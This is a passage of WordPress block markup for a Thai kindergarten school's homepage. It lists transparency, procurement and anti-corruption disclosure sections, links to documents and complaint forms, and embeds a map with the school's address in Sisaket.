left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 